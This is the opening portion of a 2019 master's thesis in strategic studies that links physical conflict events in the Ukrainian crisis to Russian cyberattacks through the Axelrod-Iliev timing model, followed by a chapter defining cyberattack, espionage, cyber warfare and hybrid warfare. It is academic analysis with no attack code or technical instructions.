University of Calgary PRISM: University of Calgary's Digital Repository
Graduate Studies The Vault: Electronic Theses and Dissertations
2019-06-17 Data-Driven Cyber Prediction in Hybrid Warfare
Devereux, Hannah
Devereux, H. (2019). Data-Driven Cyber Prediction in Hybrid Warfare (Unpublished master's thesis). University of Calgary, Calgary, AB. http://hdl.handle.net/1880/110505 master thesis
University of Calgary graduate students retain copyright ownership and moral rights for their thesis. You may use this material in any way that is permitted by the Copyright Act or through licensing that has been assigned to the document. For uses that are not allowable under copyright legislation or licensing, you are required to seek permission. Downloaded from PRISM: https://prism.ucalgary.ca UNIVERSITY OF CALGARY
Data-driven Cyber Prediction in Hybrid Warfare
by
Hannah Devereux
A THESIS
SUBMITTED TO THE FACULTY OF GRADUATE STUDIES
IN PARTIAL FULFILLMENT OF THE REQUIREMENTS FOR THE
DEGREE OF MASTER OF STRATEGIC STUDIES
GRADUATE PROGRAM IN MILITARY AND STRATEGIC STUDIES
CALGARY, ALBERTA
JUNE, 2019
© Hannah Devereux 2019 2
ABSTRACT Cyberwarfare, despite being a thoroughly discussed tactic, is consistently misunderstood and taken out of context. Cyberattacks, most often committed during hybrid warfare, are often studied apart from the physical attributes of war. There is a lack of literature that studies the interplay of cyber and physical attributes within hybrid warfare. By analyzing and assessing the
Ukrainian Crisis, this thesis investigates how physical attributes may be used to predict cyberattacks based on real world data. Using the Axelrod-Iliev equation optimal timing of cyberattack against Ukraine could be determined and, from this, defensive postures could be suggested. To test if the Axelrod-Iliev equation held true, statistical analysis was used. The statistical analysis verified the findings of the Axelrod-Iliev equation and provided groundwork for future research in the subject area. The statistical analysis found a lack of correlation between
Military Personnel/Policemen Killed/Wounded and cyberattacks, Civilians/Politicians
Killed/Wounded and cyberattacks, Protests and cyberattacks. Conversely it strongly suggested links between Bombings and cyberattack, and Open Firing and cyberattacks, which can be expounded upon to further understand the interplay of cyber and physical attributes in hybrid warfare.
Keywords: Hybrid warfare, Cyber, Military, Ukraine, Russia, Data Analytics
3
ACKNOWLEDGEMENTS
I would first like to thank my advisor, Ken Barker, for putting up with my continuously panicked emails that often used no periods or way too many exclamation points. I would not have been able to write this thesis without his guidance, his support and his acceptance of my terrible jokes. Secondly, I would like to extend my gratitude to my colleagues at the Centre for Military, Security and Strategic Studies (CMSS), especially John Reyes, as I may never have switched to writing a thesis without his incessant chanting of “one of us.” I would also like to thank my coworkers and boss at Husky Energy, who have been so understanding of my schooling and my inability to graduate on time. Although they may never read this, I am forever grateful for their support of my thesis over this past year and their willingness to discuss current events in Ukraine with me. Finally, I would like to express my thanks and my love to; my parents, Elyse and Pat, for making sure I stay humble by reminding me of my terrible grades in grade school math; my boyfriend, Patrick, for all of his support through the ups and downs of both life and this paper; and my best friends, Alex, Josie and Vicki, without whom I would have gone insane a long time ago.
4
GLOSSARY OF TERMS
ATGM- Anti-Tank Guided Missile ATO Zone- Anti-Terrorist Operation Zone. The parts of Donbas occupied by Russia/pro- Russian separatists. BE3- BlackEnergy 3 Berkut- Ukrainian Special Forces C&C- Command and Control Server CAD- Canadian Dollar CCCP- See USSR CERT- Computer Emergency Response Team (Carnegie Melon) CVSS- Common Vulnerability Scoring System DDoS- Distributed Denial of Service DHS- Department of Homeland Security (United States) DLL- Dynamic Library Link DNR- See DPR DOD- Department of Defense DoS- Denial of Service DPR- Donetsk People’s Republic EU- European Union FedCIRC- Federal Computer Incident Response Center (United States) FSB- Federal Security Service of the Russian Federation FY(year)- Fiscal Year GLBA- Gramm-Leach-Bliley Act GRAD- Soviet Truck-mounted 122mm multiple rocket launcher GRU- Main Directorate of the General Staff of the Armed Forces of the Russian Federation H.R.- House of Representatives Resolution HIPAA- Health Insurance Portability and Accountability Act (United States) HMI- Human User Interface ICANN- International Corporation for Assigned Names and Numbers 5
ICS- Industrial Control System IEC- International Electrotechnical Commission IOA- Initial Operational Assessment LNR- See LPR LOAC- Law of Armed Conflict LPR- Luhansk People’s Republic MBR- Master Boot Record MFT- Managed File Transfer MLRS- Multiple Launch Rocket System NATO- North Atlantic Treaty Organization NBS- National Bureau of Standards (United States) NCSC- National Computer Security Center (United States) NIPR- Non-Classified Information Protocol Network NSA – National Security Agency (United States) Oblenergos- Ukrainian Power distribution companies OLE- Object Link and Embedding OPC DA- Open Platform Communication Data Access OPC- Open Platform Communication OSCE- Organization for Security and Cooperation in Europe PfP- Partnership for Peace PLA- People’s Liberation Army of China PMESII- Political, Military Economic, Social, Informational and Infrastructure spectrum RAT- Remote Access Tool RTU- Remote Terminal Unit SBU-Security Services of Ukraine SFX- Self-Extracting Archives SIPR- Secret Information Protocol Router Network SMB- Service Message Block SMS- text message TPEP- Trusted Product Evaluation Program (United States) 6
UAH- Ukrainian Hryvnia UPS- Uninterruptable Power Supplies USAF- United States Air Force US-CERT- United States Computer Incident Response Center USD- United States Dollar USSR- United Soviet Socialist Republic VPN- Virtual Private Network
7
EPIGRAPH
“Laws and principles are not for the times when there is no temptation: they are for such moments as this, when body and soul rise in mutiny against their rigour ... If at my convenience I might break them, what would be their worth?” -Jane Eyre
“Of course, the fact that States lack definitive guidance on the subject does not relieve them of their obligation to comply with applicable international law in their cyber operations.” -Tallinn Manual on the International Law Applicable to Cyber Warfare, 2013
8
TABLE OF CONTENTS
1 INTRODUCTION ...... 11 1.1 Background ...... 11 1.2 Thesis Topic ...... 14 1.3 Methodology and Analytical Framework ...... 14 2 DEFINITIONS ...... 18 2.1 Cyberattack...... 18 2.2 Information Warfare ...... 20 2.3 Cyber Espionage ...... 21 2.4 Cyber Warfare ...... 23 2.5 Cybercrime ...... 24 2.6 Hybrid Warfare ...... 25 3 DISTRIBUTION OF CYBER POWER ...... 29 3.1 Infrastructure ...... 30 United States Power...... 31 Russian Power...... 33 Ukrainian Power...... 35 3.2 Legislation ...... 35 United States Legislation...... 38 Russian Legislation...... 41 Ukrainian Legislation...... 42 3.3 Funding...... 47 United States Funding...... 47 Russian Funding...... 48 Ukrainian Funding...... 48 4 UKRAINIAN CRISIS ...... 52 4.1 Historical Tensions ...... 55 Orange Revolution ...... 56 Yanukovych Wins ...... 59 4.2 Maidan Revolution ...... 59 4.3 Annexation of Crimea ...... 62 4.4 War in Donbas ...... 63 9
4.5 Cyberattacks against Ukraine ...... 64 Operation Armagedon...... 66 X-Agent...... 68 BlackEnergy 3/ Killdisk...... 71 CrashOverride/Industroyer...... 74 NotPetya...... 78 Summary...... 82 5 DETERMINING OPTIMAL TIMING ...... 83 5.1 The Axelrod-Iliev Model ...... 84 5.2 Applying the Axelrod-Iliev ...... 86 Calculating Persistence (P) ...... 88 Calculating Stealth (S) ...... 90 Calculating Threshold (T) ...... 90 Calculating Discount Rate (w) ...... 91 Applying the Equation to Ukraine Data ...... 91 5.3 Solving for Optimal Timing ...... 93 5.4 Conclusion ...... 95 6 STATISTICAL ANALYSIS ...... 97 6.1 Bombings ...... 102 6.2 Open Firing ...... 108 6.3 Military Personnel and Policemen Killed or Wounded ...... 114 6.4 Civilians and Politicians Killed or Wounded ...... 118 6.5 Protests ...... 122 7 Conclusion ...... 125 8 Bibliography ...... 130
10
11
1 INTRODUCTION
1.1 Background
The use of cyber in war is a relatively new concept, and few states have gained prominence in this area of warfare. However, as cyber evolves, so does the need for evolving defensive and offensive tactics within cyber. There is a vast amount of literature discussing different systems to secure data or databases, theoretically analyzing conflict through an international relations or historical perspective and different network defensive structures. However, the interaction between physical security and cyber security is often overlooked as both academic disciplines often remain within their own silos. Thus, there is a gap in the literature surrounding the interplay of physical, or traditional warfare, and cyberattack. While there is expansive literature on hybrid warfare, these works often look at the theoretical notion surrounding hybrid warfare or how hybrid warfare should be defined within the international community, a high-level explanation that often fails to take into account the interplay of cyber and physical on the tactical level.
The Ukrainian Crisis is the case study considered here to answer how cyber defense can be strengthened to assist smaller states with protection against a larger adversary. Ongoing hybrid warfare has become more prominent in the recent decade as the major players in the international system work to assert cyber dominance; moves that have left many smaller states at a disadvantage against cyberattacks. Ukraine has been embroiled in hybrid warfare with Russia since the Maidan
Revolution, encompassing the Annexation of Crimea and the current ongoing war in Donbas. The cyber efficiency of the Kremlin is starkly contrasted with the minimal cyber capabilities of
Ukraine. The conflict began before Ukraine had infrastructure stable enough to suitably combat cyberattacks, thus, it has consistently struggled to remain ahead of the Russian attacks. 12
Unlike in traditional warfare, defense is much more complex and difficult than offense in cyber. To attack a network only one vulnerability must be exploited, one backdoor used, or one phishing email mistakenly opened. The defense of a network must consistently be testing for vulnerabilities, downloading and installing patches, training must be current for users on the system, and the defensive systems must be monitoring, detecting and analyzing all traffic that comes across the platform. This is an expensive endeavour in both equipment and manpower, one that many states cannot afford, especially if there are other problems affecting the state. States that cannot afford strong technological defenses are at the mercy of allies or outdated technology for protection.
The background of and the relationship between Ukraine and Russia is especially important when evaluating cyberattacks against Ukraine due to the interconnectedness of Russian social and technological systems. Since Ukrainian independence, Ukraine has been in a precarious position between the West and Russia because both aim to monopolize influence over social and governmental spheres. Ukraine, as a former Soviet State, is particularly susceptible to Russian influence as many Ukrainians speak Russian as their first language. Furthermore, there is a firm divide between ethnic Ukrainian and ethnic Russian Ukrainians and their geographical location within Ukraine. Russia has always had influence over Ukrainian technology and infrastructure, and Ukraine has always been subjected to Russian technological dominance. Despite this, Russian cyber aggression spiked during the Maidan Revolution and the subsequent war in Donbas. As the
Ukrainian government and the Ukrainian people pivot towards the West, Russia has used hybrid warfare to assure the Kremlin’s continued influence over the state and its people.
While this research is focused on the relationship between Ukraine and Russia, studying cyber and physical attributes together has an impact across all future war. As technologies are 13
increasingly used on the battlefield or against foreign enemies, efforts to understand hybrid warfare from a cyber perspective is critical. A large amount of literature exists around the topic of hybrid warfare but much of it aims to define hybrid warfare, explain how cyber attributes are a logical step to incorporate into the military sphere, often focusing on how the military is changing to accommodate new technologies, or using strategic studies theories, such as deterrence, to explain the place of cyber in a war.1 Literature not focused on these categories tends to focus on the politics of using hybrid warfare, or technical ways in which hybrid warfare can be used. These tend to be silent on the interplay of the two main aspects of hybrid warfare, namely, physical and cyber; as they are primarily interested in the phenomenon itself.2
When specifically looking at cyber capabilities and the possibility of prediction, the majority of work is done from an offensive stance. Often, work from a defensive stance is focused specifically on the securitization of a specific network. Thus, this work mainly focuses on the construction of networks and how to make new technology more secure, rather than working with existing technology or working within the framework of war. For example, Hayden, et al. focuses on building secure networks and creating paths in data networks that can communicate a lockdown.3 Jabbour and Poisson focus on an analysis of system vulnerability and determining vulnerabilities within the network.4 While there is a small pool of literature that takes a defensive
1 See Media Ajir and Bethany Vailliant, “Russian Information Warfare: Implications for Deterrence Theory,” Strategic Studies Quarterly 12, No. 3 (2018): 70-89. AND Tad A. Schnaufer II, “Redefining Hybrid Warfare: Russia’s Non-linear War Against the West,” Journal of Strategic Studies 10, No. 1 (2017): 17-31. AND Bastian Giegerich, “Hybrid Warfare and the Changing Character of Conflict,” Connections: The Quarterly Journal 2 (2016):65-72. 2 See Yuriy Danyk, Tamara Maliarchuk and Chad Briggs, “Hybrid War: High-tech, Information and Cyber Conflicts,” Connections: The Quarterly Journal 16, No. 2 (2017): 5-24. AND Geoffrey Pridham, “Time to Bolster the Baltic States,” The World Today 71, No. 4(2015):40-41. AND Oliver Fitton, “Cyber Operations and Gray Zones: Challenges for NATO,” Connections: The Quarterly Journal 15, No. 2 (2016): 109-119. 3 Patrik M. Hayden, David K. Woolrich and Katherine D. Sobolewski, “Providing Cyber Situational Awareness on Defense Platform Networks,” The Cyber Defense Review 2, No. 2 (2017): 125-140. 4 Dr. Kamal Jabbour and Major Jenny Poisson, “Cyber Risk Assessment in Distributed Information Systems,” The Cyber Defense Review 1, No. 1 (2016): 91-112. 14
stance to prediction models specifically, this literature generally discounts the existence of physical warfare within hybrid warfare or focuses on network protection outside of an ongoing conflict.
Wu, et al. develop a cyber attack prediction model in 2012 that uses Bayesian networks, a graphical statistical model that predicts the conditional dependencies of two variables.
1.2 Thesis Topic
This thesis aims to fill a small portion of this gap between cyber and traditional warfare tactics rather than explaining the theory behind hybrid warfare or aim to define the international headspace concerning cyberattacks. Thus, the following question is addressed: What is the relationship between cyber attributes and physical attributes in hybrid warfare?
1.3 Methodology and Analytical Framework
The thesis begins with an examination of the literature surrounding cyber and hybrid warfare internationally and is followed by a review of power structures that influence the imbalance of cyber capabilities globally, before focusing specifically on the Ukrainian Crisis as the case study. To analyze the interplay of physical and cyber attributes of the Crisis, we then use a formula created by Axelrod and Iliev to determine the optimal timing of cyberattack. Using the
Axelrod-Iliev equation the Ukrainian Crisis is evaluated to determine if there were discernable trends in physical attributes from 90 days prior, and 90 days following, a significant cyberattack.
First, cyberattacks against Ukraine had to be analyzed and the most pertinent ones were chosen for the research presented in the thesis. Looking at the implications of each attack, how they fall under Law of Armed Conflict (LOAC) and the nature of each attack, the following five were chosen for analysis: Operation Armagedon, X-Agent, BlackEnergy3/KillDisk,
CrashOverride/Industroyer and NotPetya. When calculating the Axelrod-Iliev equation all five 15
were used, as the equation takes into account Zero-Day Exploits and exploits that continuously gather information. Only BlackEnergy3/KillDisk, CrashOverride/Industroyer and NotPetya are used in the statistical analysis because a specific attack date must be determined to facilitate comparison. Since both Operation Armagedon and X-Agent were used over a long period of time to collect sensitive Ukrainian information, they cannot be used to view trends in physical attributes.
The Axelrod-Iliev equation is a mathematical model to “analyze the optimal timing for the use of cyber resources.” This model analyzes the trade-off between waiting to use a resource and the potentiality for that exploit to be discovered and rendered useless. However, the authors acknowledge that the model is “relevant to a defender who wants to estimate how high the stakes have to be in order for the offense to exploit an unknown vulnerability.”5 Unlike the majority of models for cyber prediction, the Axelrod-Iliev equation is based on observable variables and has applications on both the offensive and defensive sides in a conflict.
The equation is originally written to take into account physical attributes of the war, with the heaviest focus on stakes in the conflict – stakes are defined by the authors using a broad example: “In one year you may be at war with the target, making the stakes very high. In another year, you may be at peace, but have just discovered that the target has some new technology you would like to be able to steal, so the stakes would be moderate. In still another year, you may have no problems with the target and the stakes would be low.”6 While this is a broad generalization, the authors argue that the stakes can change in the future, and stakes are unknown.
5 Axelrod, Robert and Rumen Iliev. “Timing of Cyber Conflict” in Proceedings of the National Academy of Sciences of the United States of America 111, no. 4 (January 28, 2014): 1299. 6 Ibid. 16
In this thesis, the equation uses all stakes (1-6) to determine which level of stake will allow the perpetrator (Russia) to remain in the system for the longest amount of time before the exploit is discovered. The model will use the data from known cyberattacks against Ukrainian infrastructure along with assumptions presented in the Axelrod-Iliev equation. From calculations at different level of stakes, it is possible to discern for which stakes an attack would be maximally beneficial. From this, defensive strategy can be formed, based on the knowledge of when a most devastating attack would take place.
Following the calculation of the Axelrod-Iliev equation, we move to statistical data of the
Ukrainian Crisis. The data was collected from the website liveuamap.com, which amasses data relevant to the Ukrainian Crisis from government sources, social media, NGO activities and local news sources, among others. This website was chosen as the collection site for data due to its wide range of reporting, corroborating information, inclusion of volunteer armies and non-military battalions operating in eastern Ukraine and collection has occurred for a longer time than other accessible data sources. The Organization for Security and Cooperation in Europe (OSCE) data is perhaps the most accurate, although it does not take into account all data groups we wanted to use for statistical analysis and, early in the collection, is sometimes presented as multiple days, weeks, and is not consistent in reporting. For these reasons, liveuamap.com is used to collect all data on a day by day basis.
1.4 Contributions
Previous research to answer questions concerning hybrid warfare is beyond the scope of our research. Our research provides the groundwork for future work in the area of multi-faceted approaches to understanding hybrid warfare and how the cyber attributes and physical attributes 17
are used in tandem. By choosing to approach the problem through exploratory data, we aim to set the groundwork for future research in this under investigated area.
First, this research may have implications for hybrid conflicts beyond the Ukrainian Crisis.
It has been shown that cyber conflict is most often between states in close geographical proximity, one being the superpower of the region and the other a smaller, satellite state.7 This research can be applied within hybrid conflicts to analyze emerging trends. Second, this research may be further pursued by analyzing the Axelrod-Iliev equation in conjunction with a game- theory approach. This approach treats both sides as actors in the conflict with decision making abilities, rather than assuming one side is stagnant, only reactive when attacked. Third, the statistical analysis can be used to approach the interplay of cyber and physical attributes in a variety of ways. Using the statistical framework presented in this research, physical attributes of the conflict, beyond what is presented in our research, may be studied to uncover further discernable trends.
7 Brandon Valerino and Ryan C. Maness, "The Dynamics of Cyber Conflict between Rival Antagonists, 2001-11," Journal of Peace Research 51, no. 3 (2014): 347-360. 18
2 DEFINITIONS
The legality of cyberattacks is largely determined by the Law of Armed Conflict (LOAC).
A lack of stable agreed upon definitions in the international community is largely because of the scope for interpretation within LOAC and the complexity of the cyber domain. The international community is divided on what should and should not be explicitly outlined in legislation. This is complicated by the definitions surrounding cyberspace and cyberweapons, as each state wants to gain superiority over others through definitions. Each state can then base their own legislation on their interests and national security concerns. A further incentive for opposing international legislation is the lack of state sovereignty and border control over cyber. Legislation based on territory and territorial control becomes more salient, as arguments can be made to either explain, or explain away, ownership of cyberattacks. Further, for average citizens, terms concerning cyberspace are used interchangeably and inappropriately, especially in the news media, causing confusion and misinformation about cyberspace and its definitions.
Due to the international disharmony surrounding definitions, it is important to define how terms are used within this thesis. Clear distinctions will be made, based on previous academic work and state governmental documents that introduce the following concepts: Cyberattack,
Information Warfare, Cyber espionage, Cyber Warfare, Cybercrime and Hybrid Warfare.
2.1 Cyberattack
The term cyberattack will be used in this thesis as an all-encompassing term for any attacks that can be defined as, either, information warfare, cyber espionage or cyber warfare. A generally accepted definition is: “A cyberattack consists of an action taken to undermine the functions of a 19
computer network for a political or national security purpose.”8 However, under this definition, cyber espionage would not be considered a cyberattack because it does not “involve altering computer networks in a way that affects their current or future ability to function.”9 This definition represents the need for a political motive, but, by removing cyber espionage from the category of cyberattacks, it removes the agency of a state to fund a cyberattack aimed at gathering information from an adversary. Classifying cyber espionage outside of the cyberattack terminology could have serious repercussions when determining what levels of retaliatory response is appropriate in the future.10 Further, the discrediting of cyber espionage removes one of the main modes of attack that have happened over networks up to this point.11
The term cyberattack is defined differently in different states, and the definitions of state security strategies should be considered when determining the overarching definition of what constitutes a cyberattack. The North Atlantic Treaty Organization (NATO) defines a cyberattack in the Glossary of Terms and Definitions as “action taken to disrupt, deny, degrade or destroy information resident in a computer and/or computer network, or the computer and/or computer network itself.”12 Canada’s Cyber Security Strategy in 2010 defined cyberattacks to “include the unintentional or unauthorized access, use, manipulation, interruption or destruction (via electronic means) of information and/or the electronic and physical infrastructure used to process, communicate and/or store that information.”13 The Tallinn Manual on the International Law
Applicable to Cyber Warfare defines a cyberattack as a “cyber operation, whether offensive or
8 Oona Hathaway, A., Rebecca Crook of, Philip Levitz, Haley NX, Aileen Nowlan, William Perdue and Julia Spiegel. "The Law of cyber-Attacks." California Law Review 100, No. 4 (2012): 826. 9 Ibid. 825. 10 Joseph S. Nye Jr. “Nuclear Lessons for Cyber Security?” Strategic Studies Quarterly 5, No. 4 (2011): 20. 11 Thomas Rid. “Cyber War Will Not Take Place,” Journal of Strategic Studies 35, No. 1 (2012):. 6. 12 AAP-06 Edition 2014. NATO Glossary of Terms and Definitions. NATO Standardization Agency. 13 Canada Use of Force Manual (2008). Use of Force for CF Operations, Canadian Forces Joint Publication. Chief of the Defence Staff, B-GJ-005-501/FP-001, August 2008. 20
defensive, that is reasonably expected to cause injury or death to persons or damage or destruction to objects.”14 The United States Department of Defense Dictionary of Military and Associated
Terms definitions for cyberattack are unclear on distinctions between types of cyberattack and most definitions are housed within definitions of other domains, such as the use of cyber in maritime warfare.15 However, for the purposes of this thesis, a cyberattack will be defined with the following parameters: (1) an unauthorized action aimed at disrupting, using, manipulating, corrupting, interrupting or destroying information, the computer or computer network(s), through either physical or electronic means and; (2) be perpetrated against a state with a political intent or a national security focus.
2.2 Information Warfare
Under the umbrella of cyberattack, information warfare is perhaps the most talked about, especially leading up to, and during, the Trump administration. Parameters for defining information warfare are largely pulled from the assertion that “Information Warfare is a subset of
Information Operations that is conducted during time of crisis or conflict to achieve or promote specific objectives over a specific adversary or adversaries.”16 In addition, information warfare must happen within the information environment, that is, the environment that encompasses both cyberspace and social networks.17 This means that any attacks against critical infrastructure, or physical attacks that are perpetrated by cyber components, do not fall under the definition of information warfare. In 1996 the RAND Corporation aimed to define the term “strategic
14 Tallinn Manual on the International Law Applicable to Cyber Warfare. Rule 30. 2013. 15 United States Department of Defense. United States Department of Defense Dictionary of Military and Associated Terms, February 2018. Washington D.C.: GPO, 2018. http://www.jcs.mil/Portals/36/Documents/Doctrine/pubs/dictionary.pdf 16 Christopher C. Joyner and Catherine Lotrionte. “Information Warfare as International Coercion: Elements of a legal Framework,” EJIL 12, No. 5 (2001); 825-865. 826-827. 17 Issac R. Porche III, Christopher Paul, Michael York, Chad C. Serena, Jerry M. Sollinger, Elliot Axelband, Endy Y. Min and Bruce J. Held. Redefining Information Warfare Boundaries for an Army in a Wireless World. RAND Corporation. 2013. 13. 21
information warfare” through the following definition: “Nations utilize cyberspace to affect strategic military operations and inflict damage on national information infrastructures.”18 The
United States Airforce, in 2001, defined information warfare as “any action to deny, exploit, corrupt, or destroy the enemy’s information and its functions; protecting ourselves against those actions; and exploiting our own military information functions.”19
Using definitions from around the globe has resulted in information warfare being defined through several aspects: (1) it must be carried out by a state against another state; (2) it must be carried out during an ongoing crisis or conflict; and (3) it is confined to the information environment, does not necessarily deal with sensitive information, and does not include attacks where any aspect of the attack is outside of the information sphere.
2.3 Cyber Espionage
Cyber espionage is perhaps the most common of all attacks that cause problems for state infrastructure and stability. Cyber espionage has many different definitions within the international community, although the majority of them are worded similarly, yet remain broad as a way to ensure the right to respond if there were to be an attack that warranted a retaliatory response.20
Internationally, the Tallinn Manual on the International Law Applicable to Cyber Warfare Rule 66 defines cyber espionage as “any act under taken clandestinely or under false pretenses that uses cyber capabilities to gather information with the intention of communicating it to the opposing
18 Roger C. Molander, Andrew S. Riddle and Peter A. Wilson. Strategic Information Warfare: The New Face of Warfare. RAND Corporation. 1996. 1. 19 Joyner and Lotrionte. “Information Warfare as International Coercion,” Supra note 5. 827. 20 See the Austrian Cyber Security Strategy (2013) in which cyber espionage is identified as “cyberattacks directed against the confidentiality of an IT system.” The Cyber Security Strategy for Germany identifies cyber espionage as “an IT attack in cyberspace directed against one or several other IT systems and aimed at damaging IT security, the aims of IT security, confidentiality, integrity and availability may all or individually be compromised.” 22
party…The act must occur in a territory controlled by a party to the conflict.”21 As with most attacks within the cyber domain, the universal problem of attribution complicates the definition.
Cyber espionage has the following distinctive attributes: (1) it must be carried out against a state by another actor, either state or non-state, for a political or national security purpose; and (2) it must be carried out during an ongoing crisis or conflict. A further point of clarification of the definition of cyber espionage, but one that is not categorically applied, includes attacks against targets in the information sphere to illegally gather sensitive data for malicious use.
Under cyber espionage it is important to acknowledge cyber terrorism as one of its subsets, but some include it with cybercrime because of its position as a criminal act in domestic legislation.22 For the purposes of this thesis cyber terrorism is included under cyber espionage as the act itself is still fundamentally against a specific state and aimed to coerce the state into a response.23 Cyber terrorism is not considered cyber warfare or cybercrime as it is: (1) perpetrated against civilians not against legitimate military targets as defined under LOAC: (2) must be used to influence a state’s response; and (3) has computer based repercussions that exceed physical repercussions. Susan Brenner in 2007 identified three types of cyber terrorism: weapons of mass destruction, weapons of mass distraction, and weapons of mass disruption.24 Each type is used to target and harm civilians, making it fundamentally different than cyber warfare in which military is the only lawful target. When a cyber weapon is used in a terrorist attack, it does not mean that that attack is ultimately an act of cyber terrorism because it must fit the criteria outlined in both cyber terrorism and cyber espionage. For example, if a terrorist group were to hack into a nuclear
21 Tallinn Manual on the International Law Applicable to Cyber Warfare (2013) Rule 66. 22 “Responding to Terrorism: Crime, Punishment and War,” Harvard Law Review 15, No. 4 (2002); 1217-1238.1224. 23 Brenner, Susan W. "'At light speed': Attribution and response to cybercrime/terrorism/warfare." The Journal of Criminal Law and Criminology 97, No.2 (2007); 379-475. 387. 24 Ibid. 390. 23
powerplant and cause a nuclear meltdown, this would be classified as a nuclear catastrophe, and a nuclear attack, not cyber terrorism.25
2.4 Cyber Warfare
The third and final type of cyberattack is cyber warfare, which is a term commonly used in the media to explain any classification of cyberattack.26 Cyber warfare can be a problematic concept, as a cyber offensive could be responsible for the beginning of a violent chain of events, however, the act itself may not be a violent action, but rather fall into the category of cyber espionage or information warfare.27 Subsequent physical violence is not considered cyber warfare.
Further, this violence does not include economic violence or other non-physical variations of violence as outlined in Article 49 of Additional Protocol I of 1977.28 Only three specific attacks are considered cyber warfare by the Pentagon’s Law of War Manual, “sparking a nuclear plant meltdown, destructively opening a dam above a populated area and causing airplane crashes by disrupting air traffic control.”29 Definitions range from bloodless war to any armed conflict assisted by cyber means, including automated drones and high tech military equipment but cyberwarfare must “have effects that amplify or are equivalent to major kinetic violence.”30 Cyber warfare, for the purposes of this thesis, must meet the following three criteria: (1) it must be an
25 Brenner, "'At light speed,'" 391. 26 Multiple news outlets use Cyber Warfare as a blanket term, similar to how cyberattack is used in this thesis. For example: The New York Times conglomerates all news relating to Information Warfare, Cyber Espionage and Cyber Crime under the banner of Cyber Warfare (https://www.nytimes.com/topic/subject/cyberwarfare). The Guardian conglomerates all cyber news under the banner of Cyber Warfare, including new technologies and security, and any cyberattack (https://www.theguardian.com/technology/cyberwar). CNN reports use Cyber Warfare to explain any form of cyberattack, including Cyber Crime, new technologies, physical security breaches that have a cyber component and physical security concerns. See the following for examples: https://www.cnn.com/2018/10/05/opinions/citizens-in-the-crossfire-of-a-cyber-war- opinion-intl/index.html https://www.cnn.com/2018/05/06/opinions/opinion-andelman/index.html https://www.cnn.com/2016/09/29/asia/china-cyber-spies-hacking/index.html 27 Thomas Rid. “Cyber War Will Not Take Place,” Journal of Strategic Studies 35, No. 1 (2012); 5-32. 9. 28 International Committee of the Red Cross (ICRC), Protocol Additional to the Geneva Conventions of 12 August 1949, and relating to the Protection of Victims of International Armed Conflicts (Protocol I), 8 June 1977 (Geneva). 29 Hayward, "Evaluating the" Imminence" of a cyber attack 419. 30 Nye Jr. “Nuclear Lessons for Cyber Security?” 20-21. 24
attack against a state perpetrated by another state, or state funded group; (2) it must be an attack that is perpetrated using offensive cyber weapons, and must be kinetic; and (3) it must be designed to have serious harm to persons or strategic objects with a government or military purpose.31
2.5 Cybercrime
Cybercrime is not directly relevant to this thesis. However, it is important to define cybercrime to alleviate confusion around the different classifications of attacks within the cyber domain. Cybercrime does not exist under the category of cyberattacks because these crimes are not attacks against a state and have neither a national security nor political objective. It is perhaps because of the omission of state focused intent that there is the most international legislation and consensus surrounding protection against cybercrime. Cybercrime can most simply be understood as “the use of computer technology to commit crime; to engage in activity that threatens a society’s ability to maintain internal order.”32 Cybercrime does not have to be for a political motive, nor does it require an attack against a state. The European Council’s Convention on Cybercrime in
2001 aimed to create a “common criminal policy aimed at the protection of society against cybercrime” that specified areas in which domestic laws needed to be adopted.33 However, this treaty let states determine what actions should be in place to protect against cybercrime, which has led to the assumption that cybercrime is “nothing more than the commission of a traditional crime by non-traditional means.”34
31 The definition has been adopted and modified from: Mette Eilstrup-Sangiovanni. “Why the World Needs an International Cyberwar Convention,” Philosophy and Technology (2017). 5. 32 Brenner, "'At light speed,’” 386. 33 Council of Europe, “Convention on Cybercrime,” European Treaty Series- No. 185. Budapest, 2001. 34 Brenner, "'At light speed,’” 383. 25
2.6 Hybrid Warfare
A concept commonly associated with cyberattacks, especially cyber warfare, is the term hybrid warfare, indicating a war fought with an array of capabilities including the use of both traditional warfare and cyberattack tactics. This definition, like the others, came into existence prior to an agreed upon definition in either domestic or international legislation or the academic literature. While the lack of definition has less impact on the ability of states to use hybrid warfare, it does complicate the retaliatory response because ambiguity is embedded within the definition of hybrid warfare. Without international agreement on what constitutes hybrid warfare, domestic governments are free to wage hybrid warfare by walking the thin line between war and espionage while hiding behind technologically veiled attacks and subversion.
Hybrid warfare is not an easy concept to explain and the distinctions in hybrid warfare are universally contested. As the Multinational Capability Development Campaign Project on
Countering Hybrid Warfare so eloquently stated: “the international consensus on hybrid warfare is clear: no one understands it.”35 The Project aims to help delay, deter or resolve hybrid warfare by promoting understanding of hybrid warfare and offers threat mitigation tactics that portray the core reasons hybrid warfare is used. First, hybrid warfare “is designed to exploit national vulnerabilities across the political, military, economic, social, informational and infrastructure
(PMESII) spectrum” to change the balance of power in favor of the attacking state across one or all of the categories in PMESII spectrum.36 Second, hybrid warfare “uses coordinated military, political, economic, civilian and information instruments of power that extend far beyond the
35 Multinational Capability Development Campaign, “Defining Hybrid Warfare,” Countering Hybrid Warfare Project (January 2017). 3. 36 Ibid. 4. 26
military realm” but can be used to achieve a shift in power similar to that of a military goal.37
Third, attacks considered to be hybrid warfare are “synchronized and systematic,” using more than one of the categories in the PMESII spectrum.38 Finally, hybrid warfare, no matter what cyber tactics are used, is an international issue that must have legislation on the international level to combat the hybrid threat.39 The overarching description created from this project is “the synchronized use of multiple instruments of power tailored to specific vulnerabilities across the full spectrum of societal functions to achieve synergistic effects.”40 This description is considered a description rather than a definition according to the authors due to the difficulty of agreeing on a common definition.”41
Definitions are a key part of international legislation and cooperation around hybrid threats, especially cyberattacks and, more often than not, states use ambiguous definitions to their advantage. The majority of states define hybrid warfare so that it can be used against other states but responded to when used against their own state. Russian legislation changes in 2014 considered all cyberattacks a variant of information warfare, opening more methods of attack under the umbrella of hybrid warfare for the Kremlin to use offensively.42 This recent change in legislation only makes the actions of the state more defensible when analyzing domestic literature. Until there is an overarching definition with strict legislation in place agreed upon at an international level there is unlikely to be any sort of reduction in number and severity of cyberattacks used in hybrid warfare. Although this topic is a more prevalent and pervasive topic currently, some forms of
37 Multinational Capability Development Campaign, “Defining Hybrid Warfare,” 8. 38 Ibid. 4. 39 Ibid. 4. 40 Ibid. 8. 41 Ibid. 8. Supra note 2. 42 Micheal Connell and Sarah Vogler. “Russia’s Approach to Cyber Warfare.” CAN Occasional Paper Series. Naval Academy. 24 March 2017. 27
hybrid war, albeit without technological advances of today, have always existed, and it is not a new tactic or invention by the current Russian government.43
